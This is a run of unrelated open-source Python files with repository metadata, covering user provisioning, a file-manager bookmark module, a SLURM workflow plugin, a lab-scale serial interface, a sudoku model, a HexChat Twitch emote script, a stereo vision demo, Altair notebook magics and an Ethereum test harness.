'lillied']
operations = ['premdasr', 'bestc', 'chawlav', 'wbarnes', 'gleasob',
'lchun', 'peteryip', 'richmoj', 'hardyb', 'martinva']
telco_eng = ['dalys', 'medinad', 'peikonb', 'kulawiak']
r = sess.query(Realm).first()
assert(r.name == 'is1.morgan')
for nm in admins:
up=UserPrincipal(name = nm, realm = r,role = admin,
comments = 'AutoPopulated')
sess.add(up)
sess.commit()
assert(up)
for nm in unixeng:
up=UserPrincipal(name = nm, realm = r,role = eng,
comments = 'AutoPopulated')
sess.add(up)
sess.commit()
assert(up)
for nm in operations:
up=UserPrincipal(name = nm, realm = r, role = ops,
comments = 'AutoPopulated')
sess.add(up)
sess.commit()
assert(up)
for nm in telco_eng:
up = UserPrincipal(name = nm, realm = r, role = telco,
comments = 'AutoPopulated')
sess.add(up)
sess.commit()
assert(up)
cnt = len(sess.query(UserPrincipal).all())
assert(cnt > 0)
log.debug('created %s users'%(cnt))
| apache-2.0 | -2,977,128,603,027,531,300 | 34.982759 | 78 | 0.597269 | false | 3.733453 | false | false | false |
yusufb/file-manager | modules/bookmark.py | 1 | 2022 | '''
Created on May 13, 2014
@author: utku, yusuf
'''
import json
import pprint
from src import jsonFile
def addToBookmarks2(jsonfile, path, name):
j = jsonFile.jsonFile()
toAdd = {'path' : path, 'name' : name}
readFromFile = j.fileToJson(jsonfile)
#pprint(readFromFile)
for paths in readFromFile:
if paths['path'] == path:
print 'already in bookmarks'
return
toWriteList = []
toWriteList.extend(readFromFile)
toWriteList.append(dict(toAdd))
if j.jsonToFile(toWriteList, jsonfile):
print 'added to bookmarks'
def checkBookmarkList(path, filePath):
return path in getAllPaths(filePath)
'''def addToBookmarks(jsonfile, path, name):
if checkBookmarkList(path, jsonfile):
print 'already in bookmarks'
else:
with open(jsonfile, 'a') as datafile:
json.dump(createJSONObject(jsonfile, path, name), datafile)
print 'added to bookmarks'''
'''def createJSONObject(jsonfile, path, name):
data = {'id':idGenerator(jsonfile), 'path':str(path), 'name':name}
return data'''
def readBookmarks(jsonFile):
plainJSONString = open(jsonFile).read();
plainJSONString = plainJSONString.replace('}{', '},{')
jsonList = '[%s]'%(plainJSONString)
jsonObj = json.loads(jsonList)
return jsonObj
def getAllPaths(jsonFile):
availablePaths = []
jsonObjj = readBookmarks(jsonFile)
for index in range(len(jsonObjj)):
availablePaths.append(jsonObjj[index]['path'])
return availablePaths
def showAllBookmarks(jsonFile):
jsonObjj = readBookmarks(jsonFile)
allBookmarks = []
for index in range(len(jsonObjj)):
allBookmarks.append(jsonObjj[index])
return allBookmarks
'''def idGenerator(jsonFile):
jsonObjj = readBookmarks(jsonFile)
if jsonObjj != []:
return jsonObjj[len(jsonObjj)-1]['id'] + 1
else:
return 0'''
| gpl-3.0 | -3,408,347,511,843,042,300 | 26.478873 | 71 | 0.626113 | false | 3.663043 | false | false | false |
FCP-INDI/nipype | nipype/pipeline/plugins/slurmgraph.py | 5 | 7236 | """Parallel workflow execution via SLURM
"""
import os
import sys
from .base import (GraphPluginBase, logger)
from ...interfaces.base import CommandLine
def node_completed_status(checknode):
"""
A function to determine if a node has previously completed it's work
:param checknode: The node to check the run status
:return: boolean value True indicates that the node does not need to be run.
"""
""" TODO: place this in the base.py file and refactor """
node_state_does_not_require_overwrite = (checknode.overwrite is False or
(checknode.overwrite is None and not
checknode._interface.always_run)
)
hash_exists = False
try:
hash_exists, _, _, _ = checknode.hash_exists()
except Exception:
hash_exists = False
return (hash_exists and node_state_does_not_require_overwrite)
class SLURMGraphPlugin(GraphPluginBase):
"""Execute using SLURM
The plugin_args input to run can be used to control the SGE execution.
Currently supported options are:
- template : template to use for batch job submission
- qsub_args : arguments to be prepended to the job execution script in the
qsub call
"""
_template = "#!/bin/bash"
def __init__(self, **kwargs):
if 'plugin_args' in kwargs and kwargs['plugin_args']:
if 'retry_timeout' in kwargs['plugin_args']:
self._retry_timeout = kwargs['plugin_args']['retry_timeout']
if 'max_tries' in kwargs['plugin_args']:
self._max_tries = kwargs['plugin_args']['max_tries']
if 'template' in kwargs['plugin_args']:
self._template = kwargs['plugin_args']['template']
if os.path.isfile(self._template):
self._template = open(self._template).read()
if 'sbatch_args' in kwargs['plugin_args']:
self._sbatch_args = kwargs['plugin_args']['sbatch_args']
if 'dont_resubmit_completed_jobs' in kwargs['plugin_args']:
self._dont_resubmit_completed_jobs = kwargs['plugin_args']['dont_resubmit_completed_jobs']
else:
self._dont_resubmit_completed_jobs = False
super(SLURMGraphPlugin, self).__init__(**kwargs)
def _submit_graph(self, pyfiles, dependencies, nodes):
def make_job_name(jobnumber, nodeslist):
"""
- jobnumber: The index number of the job to create
- nodeslist: The name of the node being processed
- return: A string representing this job to be displayed by SLURM
"""
job_name = 'j{0}_{1}'.format(jobnumber, nodeslist[jobnumber]._id)
# Condition job_name to be a valid bash identifier (i.e. - is invalid)
job_name = job_name.replace('-', '_').replace('.', '_').replace(':', '_')
return job_name
batch_dir, _ = os.path.split(pyfiles[0])
submitjobsfile = os.path.join(batch_dir, 'submit_jobs.sh')
cache_doneness_per_node = dict()
if self._dont_resubmit_completed_jobs: # A future parameter for controlling this behavior could be added here
for idx, pyscript in enumerate(pyfiles):
node = nodes[idx]
node_status_done = node_completed_status(node)
# if the node itself claims done, then check to ensure all
# dependancies are also done
if node_status_done and idx in dependencies:
for child_idx in dependencies[idx]:
if child_idx in cache_doneness_per_node:
child_status_done = cache_doneness_per_node[child_idx]
else:
child_status_done = node_completed_status(nodes[child_idx])
node_status_done = node_status_done and child_status_done
cache_doneness_per_node[idx] = node_status_done
with open(submitjobsfile, 'wt') as fp:
fp.writelines('#!/usr/bin/env bash\n')
fp.writelines('# Condense format attempted\n')
for idx, pyscript in enumerate(pyfiles):
node = nodes[idx]
if cache_doneness_per_node.get(idx, False):
continue
else:
template, sbatch_args = self._get_args(
node, ["template", "sbatch_args"])
batch_dir, name = os.path.split(pyscript)
name = '.'.join(name.split('.')[:-1])
batchscript = '\n'.join((template,
'%s %s' % (sys.executable, pyscript)))
batchscriptfile = os.path.join(batch_dir,
'batchscript_%s.sh' % name)
batchscriptoutfile = batchscriptfile + '.o'
batchscripterrfile = batchscriptfile + '.e'
with open(batchscriptfile, 'wt') as batchfp:
batchfp.writelines(batchscript)
batchfp.close()
deps = ''
if idx in dependencies:
values = ''
for jobid in dependencies[idx]:
# Avoid dependancies of done jobs
if not self._dont_resubmit_completed_jobs or cache_doneness_per_node[jobid] == False:
values += "${{{0}}}:".format(make_job_name(jobid, nodes))
if values != '': # i.e. if some jobs were added to dependency list
values = values.rstrip(':')
deps = '--dependency=afterok:%s' % values
jobname = make_job_name(idx, nodes)
# Do not use default output locations if they are set in self._sbatch_args
stderrFile = ''
if self._sbatch_args.count('-e ') == 0:
stderrFile = '-e {errFile}'.format(
errFile=batchscripterrfile)
stdoutFile = ''
if self._sbatch_args.count('-o ') == 0:
stdoutFile = '-o {outFile}'.format(
outFile=batchscriptoutfile)
full_line = '{jobNm}=$(sbatch {outFileOption} {errFileOption} {extraSBatchArgs} {dependantIndex} -J {jobNm} {batchscript} | awk \'/^Submitted/ {{print $4}}\')\n'.format(
jobNm=jobname,
outFileOption=stdoutFile,
errFileOption=stderrFile,
extraSBatchArgs=sbatch_args,
dependantIndex=deps,
batchscript=batchscriptfile)
fp.writelines(full_line)
cmd = CommandLine('bash', environ=dict(os.environ),
terminal_output='allatonce')
cmd.inputs.args = '%s' % submitjobsfile
cmd.run()
logger.info('submitted all jobs to queue')
| bsd-3-clause | 758,317,311,789,076,100 | 47.24 | 189 | 0.526534 | false | 4.45841 | false | false | false |
rgieseke/pySartorius | sartorius.py | 1 | 1654 | # -*- coding: utf-8 -*-
"""
Python Interface for
Sartorius Serial Interface for
EA, EB, GD, GE, TE scales.
2010-2011 Robert Gieseke - [email protected]
See LICENSE.
"""
import serial
class Sartorius(serial.Serial):
def __init__(self, com_port):
"""
Initialise Sartorius device.
Example:
scale = Sartorius('COM1')
"""
serial.Serial.__init__(self, com_port)
self.baudrate = 9600
self.bytesize = 7
self.parity = serial.PARITY_ODD
self.timeout = 0.5
def value(self):
"""
Return displayed scale value.
"""
try:
if self.inWaiting() == 0:
self.write('\033P\n')
answer = self.readline()
if len(answer) == 16: # menu code 7.1.1
answer = float(answer[0:11].replace(' ', ''))
else: # menu code 7.1.2
answer = float(answer[6:17].replace(' ',''))
return answer
except:
return "NA"
def display_unit(self):
"""
Return unit.
"""
self.write('\033P\n')
answer = self.readline()
try:
answer = answer[11].strip()
except:
answer = ""
return answer
def tara_zero(self):
"""
Tara and zeroing combined.
"""
self.write('\033T\n')
def tara(self):
"""
Tara.
"""
self.write('\033U\n')
def zero(self):
"""
Zero.
"""
self.write('\033V\n')
| mit | -6,888,341,060,729,988,000 | 20.972222 | 61 | 0.450423 | false | 3.900943 | false | false | false |
Lancea12/sudoku_solver | sudoku/models/board.py | 1 | 2616 | from ..main import db
import math
import logging
class Board(db.Model):
#user = models.ForeignKey(User)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
user = db.relationship('User', backref=db.backref('boards', lazy=True))
name = models.CharField(max_length=255)
anchored = models.BooleanField(default=False)
history_loc = models.IntegerField(default=-1)
shared_with = models.ManyToManyField(User, related_name='shared_with_me', through='Board_Share')
logger = logging.getLogger('solver')
class Meta:
app_label = "solver"
def context(self):
return {'name' : self.name,
'id' : self.id,
'anchored' : self.anchored,
'rows' : [row.context() for row in self.row_set.extra(order_by = ['row_index'])],
'history' : self.history_context(),
'history_loc' : self.history_loc
}
def history_context(self):
context = {}
for e in sorted(self.historyentry_set.all()):
context[e.order] = e.context()
return context
def update(self, data):
self.logger.debug('updating board')
history = data['history']
most_recent = data['most_recent']
self.history_loc = data['history_loc']
#self.logger.debug(history)
self.logger.debug('loc = %d, most recent = %d' % (self.history_loc, most_recent))
self.name = data['name']
self.anchored = data['anchored']
row_data = data['rows']
[e.delete() for e in self.historyentry_set.all()]
from solver.models.cell import Cell
for entry_index in sorted(history):
self.logger.debug('entry = %d' % (int(entry_index)))
if(int(entry_index) > most_recent):
break
entry = history[entry_index]
cell = Cell.objects.get(row__board=self.id, \
row__row_index=entry['row_index'], cell_index=entry['col_index'])
self.historyentry_set.create(cell=cell, choice=entry['choice'], \
action=entry['action'], loc=entry_index, order=entry_index)
for row in self.row_set.extra(order_by = ['row_index']):
#self.logger.debug(row.row_index)
if(not row.update(row_data.__getitem__(row.row_index))):
return False
self.save()
return True
@receiver(post_save, sender=Board)
def build_board(sender, instance, **kwargs):
if not kwargs['created']:
return
from solver.models.row import Row
from solver.models.cell import Cell
for num in range(0,9):
instance.row_set.create(row_index=num)
for row in instance.row_set.all():
for index in range(0,9):
Cell.objects.create(row=row, cell_index=index)
| mit | -6,964,963,407,222,402,000 | 31.296296 | 98 | 0.638761 | false | 3.388601 | false | false | false |
Poorchop/hexchat-scripts | twitch-autoemote.py | 2 | 8205 | # coding=utf-8
import hexchat
import os
import sys
if sys.version_info[0] == 2:
import urllib2 as urllib_error
import urllib as urllib_request
else:
import urllib.error as urllib_error
import urllib.request as urllib_request
__module_name__ = "Twitch Emote Autoformat"
__module_author__ = "Poorchop"
__module_version__ = "0.8"
__module_description__ = "Automatically format TwitchTV emote names with proper capitalization"
# TODO: cross platform support
# TODO: emote unicode character support
# TODO: only load subscriber emotes for subscribed/specified channels
# change this value to False if you do not wish to use subscriber emotes
allow_sub_emotes = True
events = ("Channel Message", "Channel Msg Hilight",
"Channel Action", "Channel Action Hilight",
"Your Message")
edited = False
# emote names taken from: http://twitchemotes.com/
# list last updated August 18, 2014
emote_dict = {'4head': '4Head',
'arsonnosexy': 'ArsonNoSexy',
'asianglow': 'AsianGlow',
'atgl': 'AtGL',
'ativy': 'AtIvy',
'atww': 'AtWW',
'bcwarrior': 'BCWarrior',
'bort': 'BORT',
'batchest': 'BatChest',
'biblethump': 'BibleThump',
'bigbrother': 'BigBrother',
'bionicbunion': 'BionicBunion',
'blargnaunt': 'BlargNaut',
'bloodtrail': 'BloodTrail',
'brainslug': 'BrainSlug',
'brokeback': 'BrokeBack',
'cougarhunt': 'CougarHunt',
'daesuppy': 'DAESuppy',
'dbstyle': 'DBstyle',
'dansgame': 'DansGame',
'datsheffy': 'DatSheffy',
'dogface': 'DogFace',
'eagleeye': 'EagleEye',
'elegiggle': 'EleGiggle',
'evilfetus': 'EvilFetus',
'fpsmarksman': 'FPSMarksman',
'fungineer': 'FUNgineer',
'failfish': 'FailFish',
'frankerz': 'FrankerZ',
'freakinstinkin': 'FreakinStinkin',
'fuzzyotteroo': 'FuzzyOtterOO',
'gasjoker': 'GasJoker',
'gingerpower': 'GingerPower',
'grammarking': 'GrammarKing',
'hassaanchop': 'HassaanChop',
'hassanchop': 'HassanChop',
'hotpokket': 'HotPokket',
'itsboshytime': 'ItsBoshyTime',
'jkanstyle': 'JKanStyle',
'jebaited': 'Jebaited',
'joncarnage': 'JonCarnage',
'kapow': 'KAPOW',
'kzassault': 'KZassault',
'kzcover': 'KZcover',
'kzguerilla': 'KZguerilla',
'kzhelghast': 'KZhelghast',
'kzowl': 'KZowl',
'kzskull': 'KZskull',
'kappa': 'Kappa',
'keepo': 'Keepo',
'kevinturtle': 'KevinTurtle',
'kippa': 'Kippa',
'kreygasm': 'Kreygasm',
'mvgame': 'MVGame',
'mechasupes': 'MechaSupes',
'mrdestructoid': 'MrDestructoid',
'nightbat': 'NightBat',
'ninjatroll': 'NinjaTroll',
'nonospot': 'NoNoSpot',
'omgscoots': 'OMGScoots',
'onehand': 'OneHand',
'opieop': 'OpieOP',
'optimizeprime': 'OptimizePrime',
'pjharley': 'PJHarley',
'pjsalt': 'PJSalt',
'pmstwin': 'PMSTwin',
'panicvis': 'PanicVis',
'pazpazowitz': 'PazPazowitz',
'peopleschamp': 'PeoplesChamp',
'picomause': 'PicoMause',
'pipehype': 'PipeHype',
'pogchamp': 'PogChamp',
'poooound': 'Poooound',
'punchtrees': 'PunchTrees',
'ralpherz': 'RalpherZ',
'redcoat': 'RedCoat',
'residentsleeper': 'ResidentSleeper',
'ritzmitz': 'RitzMitz',
'rulefive': 'RuleFive',
'smorc': 'SMOrc',
'smskull': 'SMSkull',
'ssssss': 'SSSsss',
'shazbotstix': 'ShazBotstix',
'shazam': "Shazam",
'sobayed': 'SoBayed',
'sonnerlater': 'SoonerLater',
'srihead': 'SriHead',
'stonelightning': 'StoneLightning',
'strawbeary': 'StrawBeary',
'supervinlin': 'SuperVinlin',
'swiftrage': 'SwiftRage',
'tf2john': 'TF2John',
'tehfunrun': 'TehFunrun',
'theringer': 'TheRinger',
'thetarfu': 'TheTarFu',
'thething': 'TheThing',
'thunbeast': 'ThunBeast',
'tinyface': 'TinyFace',
'toospicy': 'TooSpicy',
'trihard': 'TriHard',
'uleetbackup': 'UleetBackup',
'unsane': 'UnSane',
'unclenox': 'UncleNox',
'volcania': 'Volcania',
'wtruck': 'WTRuck',
'wholewheat': 'WholeWheat',
'winwaker': 'WinWaker',
'youwhy': 'YouWHY',
'aneleanele': 'aneleanele',
'noscope420': 'noScope420',
'shazamicon': 'shazamicon'}
def parse_sub_emotes(file_path):
f = open(file_path, "r")
for line in f:
stripped_emote = line.replace("\n", "")
lowercase_emote = stripped_emote.lower()
emote_dict[lowercase_emote] = stripped_emote
f.close()
def download_emotes(file_path):
url = "https://raw.githubusercontent.com/Poorchop/hexchat-scripts/master/twitch-sub-emotes.txt"
try:
urllib_request.urlretrieve(url, file_path)
hexchat.prnt("Successfully downloaded subscriber emote list")
parse_sub_emotes(file_path)
except urllib_error.HTTPError as e:
hexchat.prnt("Could not retrieve subscriber emote list ({}), try downloading manually at {} and then reload "
"this script".format(e, url))
if allow_sub_emotes:
file_path = os.path.join(hexchat.get_info("configdir"),
"addons", "twitch-sub-emotes.txt")
if os.path.exists(file_path):
parse_sub_emotes(file_path)
else:
download_emotes(file_path)
def is_twitch():
server = hexchat.get_info("host")
if server and "twitch.tv" in server:
return True
else:
return False
def keypress_cb(word, word_eol, userdata):
key = word[0]
mod = word[1]
# a ctrl backspace
if (key, mod) == ("97", "4") or key == "65288":
return
if is_twitch():
msg = hexchat.get_info("inputbox")
if msg:
split_words = msg.split(" ")
for w in split_words:
if w.lower() in emote_dict:
split_words[split_words.index(w)] = emote_dict[w.lower()]
new_msg = " ".join(split_words)
hexchat.command("SETTEXT {}".format(new_msg))
hexchat.command("SETCURSOR {}".format(len(new_msg)))
def emote_cb(word, word_eol, event):
word = [(word[i] if len(word) > i else "") for i in range(4)]
global edited
if edited:
return
if is_twitch():
word[1] = word[1] \
.replace(":)", "😊") \
.replace(":(", "☹") \
.replace(":z", "😴") \
.replace("B)", "😎") \
.replace(";)", "😉") \
.replace(";p", "😜") \
.replace(":p", "😛") \
.replace(":D", "😄") \
.replace(">(", "😠") \
.replace("<3", "♥") \
.replace("BionicBunion", "😺") \
.replace("FrankerZ", "🐶") \
.replace("ItsBoshyTime", "⚠") \
.replace("Kappa", "😏") \
.replace("KZskull", "💀")
edited = True
hexchat.emit_print(event, *word)
edited = False
return hexchat.EAT_ALL
hexchat.hook_print("Key Press", keypress_cb)
for event in events:
hexchat.hook_print(event, emote_cb, event, priority=hexchat.PRI_HIGH)
hexchat.prnt(__module_name__ + " version " + __module_version__ + " loaded")
| mit | -3,323,768,482,977,047,600 | 32.871369 | 117 | 0.503246 | false | 3.253487 | false | false | false |
mosimos/sr_data_generator | feeder/simple_feeder.py | 1 | 1456 | #!/usr/bin/python
# Copyright 2015 Andreas Mosburger
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import json
import time
import argparse
#streams triples from a file to a streaming engine
parser = argparse.ArgumentParser(description='Stream triples read from capture_file to stdout')
parser.add_argument('capture_file', type=argparse.FileType('r'))
parser.add_argument('-d', '--delay', type=float, default=0)
args = parser.parse_args()
for line in args.capture_file:
time.sleep(args.delay)
triple = line.rstrip()
triple = triple.split(" ")
if len(triple) == 3:
#simple triple, separated by blanks
print(json.dumps(triple))
sys.stdout.flush()
else:
if len(triple) == 4:
#simple triple, separated by blanks, timestamp in the front
print(json.dumps(triple[1:4]))
sys.stdout.flush()
else:
print('match error')
| apache-2.0 | -6,265,478,465,321,076,000 | 29.978723 | 95 | 0.684753 | false | 3.862069 | false | false | false |
kirbyfan64/shedskin | examples/stereo_main.py | 6 | 4284 | # James M. Coughlan
# Simple Belief Propagation stereo implementation using Shed Skin.
# Use speed-up technique from:
# J. Coughlan and H. Shen. "An Embarrassingly Simple Speed-Up of Belief Propagation with Robust Potentials." arXiv. 2010. http://arxiv.org/abs/1010.0012
import numpy as np
import pylab as pl
from scipy import interpolate
# above line must be imported *after* changing directory!
interp1d=interpolate.interp1d
from math import floor
import scipy
from scipy.misc import imread, imsave
from stereo import do_sweepsSS2
##############
Lnam, Rnam='L.bmp','R.bmp'
nd=40 #number of disparities
dmin,dmax=0,19 #min, max disparities
Tu,Tb=15,3 #discontinuity thresholds (unary, binary potentials)
unBeta,binBeta=1/5., 0.75
num_sweeps = 5
##############
#from integer index to real-valued disparity:
disps=[dmin + k/(nd-1.)*(dmax-dmin) for k in range(nd)]
pl.close('all')
pl.ion()
imL,imR=imread(Lnam)+0.,imread(Rnam)+0.
h,w=np.shape(imL)
print 'h,w:',h,w
rlo,rhi,clo,chi=0,h,0,w
h2,w2=h,w
print 'h2,w2:',h2,w2
#make unary potential:
print 'calculating unPots'
unPots=np.zeros((h2,w2,nd),float) #unPots[i,j,d]
errors=np.zeros((h2,w2,nd),float)
x_sparse=np.arange(w)
for i in range(rlo,rhi):
print 'row:',i,
y_sparse=imL[i,:]
for j in range(clo,chi):
func=interp1d(x_sparse,y_sparse)
x_dense=np.clip(np.array([j+d for d in disps]),0.,w-1) #clip so that nothing is out of bounds
y_dense=func(x_dense)
errors[i-rlo,j-clo,:]=np.array([min(abs(y-imR[i,j]),Tu) for y in y_dense])
unPots=np.exp(-unBeta*errors)
print
#make binary potential (homogeneous, and assume symmetric!):
print 'calculating binPots'
binPots=np.ones((nd,nd),float) #binPots[d0,d1]
f0=np.exp(-binBeta*Tb)
for d0 in range(nd):
for d1 in range(nd):
binPots[d0,d1]=np.exp(-binBeta*min(abs(d0-d1),Tb))
#make messages (Left, Right, Up, Down) and initialize to all ones:
#convention: all message indices [i,j] label ***source*** (not destination) of message
msgs={'L':np.ones((h2,w2,nd),float), 'R':np.ones((h2,w2,nd),float),
'U':np.ones((h2,w2,nd),float), 'D':np.ones((h2,w2,nd),float)}
def getbeliefs(unPots,msgs):
h,w,jnk=np.shape(unPots)
unBels=unPots+0.
for i0 in range(h):
for j0 in range(w):
incoming_nodes=[(i0-1,j0,'D'), (i0+1,j0,'U'), (i0,j0-1,'R'), (i0,j0+1,'L')]
for (i,j,direc) in incoming_nodes:
if i>=0 and i<h and j>=0 and j<w:
unBels[i0,j0,:] *= msgs[direc][i,j,:]
unBels[i0,j0,:] /= np.sum(unBels[i0,j0,:]) #normalize beliefs
return unBels #unBels[i,j,d]
def getwinners(unBels):
#at each pixel, what is the winning disparity?
h,w,nd=np.shape(unBels)
winners=np.ones((h,w),int)
for i in range(h):
for j in range(w):
winners[i,j]=np.argmax(unBels[i,j,:])
return winners
#(row,col) pixel ranges for each update direction, for use with range() function:
ranges={'L':[(0,h2,1),(w2-1,0,-1)],'R':[(0,h2,1),(0,w2-1,1)],'U':[(h2-1,0,-1),(0,w2,1)],'D':[(0,h2-1,1),(0,w2,1)]}
#note that range should go from right column to left column for 'L' update, etc.
#note: must be compatible with the SS version, which will work on messages padded on each side to eliminate special border cases
def do_sweeps(unPots, binPots, msgs, nsweeps):
h,w,nd=np.shape(msgs['L'])
h2,w2=h+2,w+2
msgs2={}
for dir in ['L','R','U','D']:
msgs2[dir]=np.ones((h2,w2,nd),float)
msgs2[dir][1:(h2-1),1:(w2-1),:]=msgs[dir]+0.
msgs2['L'],msgs2['R'],msgs2['U'],msgs2['D']=do_sweepsSS2(unPots.tolist(), binPots.tolist(), msgs2['L'].tolist(),msgs2['R'].tolist(),msgs2['U'].tolist(),msgs2['D'].tolist(), nsweeps, h2,w2,nd, Tb, f0)
for dir in ['L','R','U','D']:
msgs2[dir]=np.array(msgs2[dir]) #convert from lists:
msgs2[dir]=msgs2[dir][1:(h2-1),1:(w2-1)][:]+0
return msgs2
#do BP sweeps:
msgs=do_sweeps(unPots, binPots, msgs, num_sweeps)
unBels=getbeliefs(unPots,msgs)
winners=getwinners(unBels)
pl.figure();pl.imshow(winners,interpolation='nearest');pl.title('winners');pl.colorbar()
pl.show()
raw_input('<press enter>')
| gpl-3.0 | 161,251,538,424,213,600 | 32.829268 | 203 | 0.619981 | false | 2.464902 | false | false | false |
ellisonbg/altair | altair/_magics.py | 1 | 5226 | """
Magic functions for rendering vega/vega-lite specifications
"""
__all__ = ['vega', 'vegalite']
import json
import warnings
import IPython
from IPython.core import magic_arguments
import pandas as pd
import six
from toolz import pipe
from altair.vegalite import v1 as vegalite_v1
from altair.vegalite import v2 as vegalite_v2
from altair.vega import v2 as vega_v2
from altair.vega import v3 as vega_v3
try:
import yaml
YAML_AVAILABLE = True
except ImportError:
YAML_AVAILABLE = False
RENDERERS = {
'vega': {
'2': vega_v2.Vega,
'3': vega_v3.Vega,
},
'vega-lite': {
'1': vegalite_v1.VegaLite,
'2': vegalite_v2.VegaLite,
}
}
TRANSFORMERS = {
'vega': {
# Vega doesn't yet have specific data transformers; use vegalite
'2': vegalite_v1.data_transformers,
'3': vegalite_v2.data_transformers,
},
'vega-lite': {
'1': vegalite_v1.data_transformers,
'2': vegalite_v2.data_transformers,
}
}
def _prepare_data(data, data_transformers):
"""Convert input data to data for use within schema"""
if data is None or isinstance(data, dict):
return data
elif isinstance(data, pd.DataFrame):
return pipe(data, data_transformers.get())
elif isinstance(data, six.string_types):
return {'url': data}
else:
warnings.warn("data of type {0} not recognized".format(type(data)))
return data
def _get_variable(name):
"""Get a variable from the notebook namespace."""
ip = IPython.get_ipython()
if ip is None:
raise ValueError("Magic command must be run within an IPython "
"environemnt, in which get_ipython() is defined.")
if name not in ip.user_ns:
raise NameError("argument '{0}' does not match the "
"name of any defined variable".format(name))
return ip.user_ns[name]
@magic_arguments.magic_arguments()
@magic_arguments.argument(
'data',
nargs='*',
help='local variable name of a pandas DataFrame to be used as the dataset')
@magic_arguments.argument('-v', '--version', dest='version', default='3')
@magic_arguments.argument('-j', '--json', dest='json', action='store_true')
def vega(line, cell):
"""Cell magic for displaying Vega visualizations in CoLab.
%%vega [name1:variable1 name2:variable2 ...] [--json] [--version='3']
Visualize the contents of the cell using Vega, optionally specifying
one or more pandas DataFrame objects to be used as the datasets.
If --json is passed, then input is parsed as json rather than yaml.
"""
args = magic_arguments.parse_argstring(vega, line)
version = args.version
assert version in RENDERERS['vega']
Vega = RENDERERS['vega'][version]
data_transformers = TRANSFORMERS['vega'][version]
def namevar(s):
s = s.split(':')
if len(s) == 1:
return s[0], s[0]
elif len(s) == 2:
return s[0], s[1]
else:
raise ValueError("invalid identifier: '{0}'".format(s))
try:
data = list(map(namevar, args.data))
except ValueError:
raise ValueError("Could not parse arguments: '{0}'".format(line))
if args.json:
spec = json.loads(cell)
elif not YAML_AVAILABLE:
try:
spec = json.loads(cell)
except json.JSONDecodeError:
raise ValueError("%%vega: spec is not valid JSON. "
"Install pyyaml to parse spec as yaml")
else:
spec = yaml.load(cell)
if data:
spec['data'] = []
for name, val in data:
val = _get_variable(val)
prepped = _prepare_data(val, data_transformers)
prepped['name'] = name
spec['data'].append(prepped)
return Vega(spec)
@magic_arguments.magic_arguments()
@magic_arguments.argument(
'data',
nargs='?',
help='local variablename of a pandas DataFrame to be used as the dataset')
@magic_arguments.argument('-v', '--version', dest='version', default='2')
@magic_arguments.argument('-j', '--json', dest='json', action='store_true')
def vegalite(line, cell):
"""Cell magic for displaying vega-lite visualizations in CoLab.
%%vegalite [dataframe] [--json] [--version=2]
Visualize the contents of the cell using Vega-Lite, optionally
specifying a pandas DataFrame object to be used as the dataset.
if --json is passed, then input is parsed as json rather than yaml.
"""
args = magic_arguments.parse_argstring(vegalite, line)
version = args.version
assert version in RENDERERS['vega-lite']
VegaLite = RENDERERS['vega-lite'][version]
data_transformers = TRANSFORMERS['vega-lite'][version]
if args.json:
spec = json.loads(cell)
elif not YAML_AVAILABLE:
try:
spec = json.loads(cell)
except json.JSONDecodeError:
raise ValueError("%%vegalite: spec is not valid JSON. "
"Install pyyaml to parse spec as yaml")
else:
spec = yaml.load(cell)
if args.data is not None:
data = _get_variable(args.data)
spec['data'] = _prepare_data(data, data_transformers)
return VegaLite(spec)
| bsd-3-clause | 8,783,827,984,406,396,000 | 28.693182 | 79 | 0.626674 | false | 3.589286 | false | false | false |
cc1-cloud/cc1 | src/wi/forms/cm.py | 1 | 1670 | # -*- coding: utf-8 -*-
# @COPYRIGHT_begin
#
# Copyright [2010-2014] Institute of Nuclear Physics PAN, Krakow, Poland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @COPYRIGHT_end
"""@package src.wi.forms.cm
@author Krzysztof Danielowski
@author Piotr Wójcik
@date 03.12.2010
"""
from django import forms
from django.utils.translation import ugettext_lazy as _
from wi.utils.forms import PasswordForm, attrs_dict
from wi.utils.regexp import regexp, regexp_text
class EditCMForm(forms.Form):
"""
Class for <b>CM edition</b> form.
"""
name = forms.RegexField(regex=regexp['dev_name'],
max_length=40,
label=_("Name"),
widget=forms.TextInput(attrs=attrs_dict),
error_messages={'invalid': regexp_text['dev_name']})
address = forms.CharField(widget=forms.TextInput(attrs=dict(attrs_dict, maxlength=45)),
label=_("Address"))
port = forms.IntegerField(label=_("Port"))
class CreateCMForm(EditCMForm, PasswordForm):
"""
Class for <b>CM creation</b> form.
"""
| apache-2.0 | 2,417,444,015,431,224,300 | 31.72549 | 91 | 0.648292 | false | 3.810502 | false | false | false |
joelcan/tools-eth-contract-dev | pyethereum/pyethereum/tester.py | 1 | 7747 | import shutil
import tempfile
import time
import logging
import sys
import spv
import pyethereum
import pyethereum.db as db
import pyethereum.opcodes as opcodes
from pyethereum.slogging import get_logger, LogRecorder, configure_logging
serpent = None
u = pyethereum.utils
t = pyethereum.transactions
b = pyethereum.blocks
pb = pyethereum.processblock
vm = pyethereum.vm
accounts = []
keys = []
for i in range(10):
keys.append(u.sha3(str(i)))
accounts.append(u.privtoaddr(keys[-1]))
k0, k1, k2, k3, k4, k5, k6, k7, k8, k9 = keys[:10]
a0, a1, a2, a3, a4, a5, a6, a7, a8, a9 = accounts[:10]
seed = 3 ** 160
# Pseudo-RNG (deterministic for now for testing purposes)
def rand():
global seed
seed = pow(seed, 2, 2 ** 512)
return seed % 2 ** 256
class state():
def __init__(self, num_accounts=len(keys)):
global serpent
if not serpent:
serpent = __import__('serpent')
self.temp_data_dir = tempfile.mkdtemp()
self.db = db.DB(u.db_path(self.temp_data_dir))
o = {}
for i in range(num_accounts):
o[accounts[i]] = 10 ** 24
self.block = b.genesis(self.db, o)
self.blocks = [self.block]
self.block.timestamp = 1410973349
self.block.coinbase = a0
